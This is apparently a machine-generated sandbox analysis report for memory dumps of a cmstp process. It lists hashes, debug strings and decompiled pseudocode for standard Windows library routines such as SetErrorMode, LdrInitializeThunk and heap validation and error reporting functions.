Function 00DBD41E Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00DB7C83,?), ref: 00DBD44B

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: bdf6493e41efffba92ccee3c4f6c2b2bf759241eceb97774eb33cbe88a5d9cae
Instruction ID: 6b66529679ac022e7411bb4ed481a998e8d5c304632b12322e5ca95a7a6e471a
Opcode Fuzzy Hash: bdf6493e41efffba92ccee3c4f6c2b2bf759241eceb97774eb33cbe88a5d9cae
Instruction Fuzzy Hash: 1ED0A7767502007BF610FAE09D03F6631899B84B10F0E4068F94DEB3C3D924D9014671

Uniqueness

Uniqueness Score: -1.00%

Function 0511967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05119694

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6d73d66f77fbb60e1817ec8fbd3166ac7660ef8481fbd5779595a4efe0af1e4c
Instruction ID: 5680a3f7a9868f2d395f82bd54acf89f62043df59c78b2e8475889b4dca70bdc
Opcode Fuzzy Hash: 6d73d66f77fbb60e1817ec8fbd3166ac7660ef8481fbd5779595a4efe0af1e4c
Instruction Fuzzy Hash: 6CB02BB18010C0C5D600D3604708B27390077C0300F22C061D2020640A033CC0A1F1B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0518B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0518B39B
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0518B305
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0518B3D6
This failed because of error %Ix., xrefs: 0518B446
write to, xrefs: 0518B4A6
*** enter .cxr %p for the context, xrefs: 0518B50D
*** An Access Violation occurred in %ws:%s, xrefs: 0518B48F
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0518B314
The resource is owned exclusively by thread %p, xrefs: 0518B374
an invalid address, %p, xrefs: 0518B4CF
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0518B38F
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0518B2F3
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0518B484
*** then kb to get the faulting stack, xrefs: 0518B51C
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0518B323
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0518B2DC
*** Inpage error in %ws:%s, xrefs: 0518B418
The resource is owned shared by %d threads, xrefs: 0518B37E
The critical section is owned by thread %p., xrefs: 0518B3B9
Go determine why that thread has not released the critical section., xrefs: 0518B3C5
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0518B476
The instruction at %p tried to %s , xrefs: 0518B4B6
read from, xrefs: 0518B4AD, 0518B4B2
a NULL pointer, xrefs: 0518B4E0
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0518B53F
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0518B47D
The instruction at %p referenced memory at %p., xrefs: 0518B432
<unknown>, xrefs: 0518B27E, 0518B2D1, 0518B350, 0518B399, 0518B417, 0518B48E
*** enter .exr %p for the exception record, xrefs: 0518B4F1
*** Resource timeout (%p) in %ws:%s, xrefs: 0518B352

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 595889df2c5dabdd533049556ec4ca26c953c32deb32101145f5a2a0de25266a
Instruction ID: beef44927b1eea451cd1a4868b2f4f0ef83ad290051cfb9a35c7a3065eb7a14b
Opcode Fuzzy Hash: 595889df2c5dabdd533049556ec4ca26c953c32deb32101145f5a2a0de25266a
Instruction Fuzzy Hash: F581E376A48210FBCB35BB05DC9AD7E3F27AF47691B864098F4051F212D3719861EA72

Uniqueness

Uniqueness Score: -1.00%

Function 05191C06 Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E05191C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x50b48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E050DB150();
				} else {
					E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x51c589c);
				E050DB150("Heap error detected at %p (heap handle %p)\n",  *0x51c58a0);
				_t27 =  *0x51c5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M05191E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E050DB150();
				} else {
					E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E050DB150("Error code: %d - %s\n",  *0x51c5898);
				_t113 =  *0x51c58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E050DB150();
					} else {
						E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E050DB150("Parameter1: %p\n",  *0x51c58a4);
				}
				_t115 =  *0x51c58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E050DB150();
					} else {
						E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E050DB150("Parameter2: %p\n",  *0x51c58a8);
				}
				_t117 =  *0x51c58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E050DB150();
					} else {
						E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E050DB150("Parameter3: %p\n",  *0x51c58ac);
				}
				_t119 =  *0x51c58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E050DB150();
					} else {
						E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x51c58b4);
					E050DB150("Last known valid blocks: before - %p, after - %p\n",  *0x51c58b0);
				} else {
					_t120 =  *0x51c58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E050DB150();
				} else {
					E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E050DB150("Stack trace available at %p\n", 0x51c58c0);
			}

0x05191c10
0x05191c16
0x05191c1e
0x05191c3d
0x05191c3e
0x05191c20
0x05191c35
0x05191c3a
0x05191c44
0x05191c55
0x05191c5a
0x05191c65
0x05191c67
0x00000000
0x05191c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x05191c67
0x05191cdc
0x05191ce5
0x05191d04
0x05191d05
0x05191ce7
0x05191cfc
0x05191d01
0x05191d0b
0x05191d17
0x05191d1f
0x05191d25
0x05191d30
0x05191d4f
0x05191d50
0x05191d32
0x05191d47
0x05191d4c
0x05191d61
0x05191d67
0x05191d68
0x05191d6e
0x05191d79
0x05191d98
0x05191d99
0x05191d7b
0x05191d90
0x05191d95
0x05191daa
0x05191db0
0x05191db1
0x05191db7
0x05191dc2
0x05191de1
0x05191de2
0x05191dc4
0x05191dd9
0x05191dde
0x05191df3
0x05191df9
0x05191dfa
0x05191e00
0x05191e0a
0x05191e13
0x05191e32
0x05191e33
0x05191e15
0x05191e2a
0x05191e2f
0x05191e39
0x05191e4a
0x05191e02
0x05191e02
0x05191e08
0x00000000
0x00000000
0x05191e08
0x05191e5b
0x05191e7a
0x05191e7b
0x05191e5d
0x05191e72
0x05191e77
0x05191e95

Strings

heap_failure_buffer_overrun, xrefs: 05191C98
heap_failure_listentry_corruption, xrefs: 05191CD0
heap_failure_generic, xrefs: 05191C7C
Heap error detected at %p (heap handle %p), xrefs: 05191C50
HEAP[%wZ]: , xrefs: 05191C30, 05191CF7, 05191D42, 05191D8B, 05191DD4, 05191E25, 05191E6D
heap_failure_multiple_entries_corruption, xrefs: 05191C8A
heap_failure_unknown, xrefs: 05191C75
heap_failure_invalid_allocation_type, xrefs: 05191CB4
heap_failure_entry_corruption, xrefs: 05191C83
HEAP: , xrefs: 05191C16, 05191C3D, 05191D04, 05191D4F, 05191D98, 05191DE1, 05191E32, 05191E7A
Error code: %d - %s, xrefs: 05191D12
heap_failure_cross_heap_operation, xrefs: 05191CC2
Parameter2: %p, xrefs: 05191DA5
Parameter1: %p, xrefs: 05191D5C
heap_failure_virtual_block_corruption, xrefs: 05191C91
heap_failure_usage_after_free, xrefs: 05191CBB
heap_failure_block_not_busy, xrefs: 05191CA6
Stack trace available at %p, xrefs: 05191E86
Parameter3: %p, xrefs: 05191DEE
heap_failure_internal, xrefs: 05191C6E
Last known valid blocks: before - %p, after - %p, xrefs: 05191E45
heap_failure_lfh_bitmap_mismatch, xrefs: 05191CD7
heap_failure_buffer_underrun, xrefs: 05191C9F
heap_failure_invalid_argument, xrefs: 05191CAD
heap_failure_freelists_corruption, xrefs: 05191CC9

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 6071e9b6d47b24cc69fa380615d81d87e5837d305b3747b6b3ccbc51e4fbd0d8
Instruction ID: f5c13fc0c080934024fd2054540c5232c983db5304f3b63fa6d9708cb1c125fd
Opcode Fuzzy Hash: 6071e9b6d47b24cc69fa380615d81d87e5837d305b3747b6b3ccbc51e4fbd0d8
Instruction Fuzzy Hash: EC610B3A6A5242EFDA2AD744F489D2D7BFAE740921B4F40ADF40A5B340C735A8C0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 05194AEF Relevance: 11.8, Strings: 9, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E05194AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E050DB150();
						} else {
							E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E050DB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E050DB150();
					} else {
						E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0518FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E050DB150();
						} else {
							E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E050DB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E050DB150();
								} else {
									E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E050DB150();
									} else {
										E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E050DB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0518FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E050DB150();
										} else {
											E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E0512D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E050DB150();
								} else {
									E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E0519A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E050FE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E0519A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E050FE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E050FA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E050FA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E050FBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E051823E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E050D1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
